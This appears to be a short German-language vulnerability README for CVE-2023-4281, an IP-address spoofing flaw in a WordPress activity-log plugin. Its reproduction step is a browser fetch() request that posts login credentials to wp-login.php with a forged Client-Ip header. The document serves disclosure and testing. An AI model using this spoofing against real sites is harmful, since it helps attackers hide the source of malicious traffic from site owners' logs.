
Repository für die Schwachstelle CVE-2023-4281.
CVE ID: CVE-2023-4281
Schwachstellentyp: IP-Adressen-Spoofing
Beschreibung: Das Activity-Log-Plugin ruft Client-IP-Adressen aus potenziell nicht vertrauenswürdigen Headern ab, sodass ein Angreifer deren Wert manipulieren kann. Dies kann genutzt werden, um die Quelle böswilligen Datenverkehrs zu verbergen.
Schritte zur Reproduktion:
Run the following code in the web browser and note on the backend that the IP address has been faked.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
Referenzen: